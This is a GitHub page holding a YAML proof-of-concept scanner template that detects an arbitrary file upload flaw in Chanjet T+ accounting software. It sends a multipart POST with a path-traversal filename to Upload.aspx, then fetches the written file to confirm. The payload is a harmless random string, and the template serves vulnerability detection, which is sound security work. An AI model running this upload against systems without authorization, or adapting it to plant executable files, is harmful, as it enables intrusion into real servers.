forked from MeowwBox/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
/
changjie-tplus-upload-writefile.yml
executable file
·33 lines (33 loc) · 1.28 KB
/
changjie-tplus-upload-writefile.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
name: poc-yaml-yonyou-chanjet-file-upload
binding: e5c175f6-c1de-4b4b-83ea-096acfebf9dd
manual: true
detail:
author: Jarcis-cy
links:
- https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1
vulnerability:
id: CT-475791
level: critical
warning: 注意该脚本会上传文件产生一个临时的无害文件
transport: http
set:
randstr: randomLowercase(60)
rboundary: randomLowercase(8)
randname: randomLowercase(6)
rules:
r0:
request:
cache: true
method: POST
path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"File1\"; filename=\"../../../img/login/{{randname}}.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n{{randstr}}\r\n------WebKitFormBoundary{{rboundary}}--"
expression: response.status == 200
r1:
request:
cache: true
method: GET
path: /tplus/img/login/{{randname}}.jpg
expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0() && r1()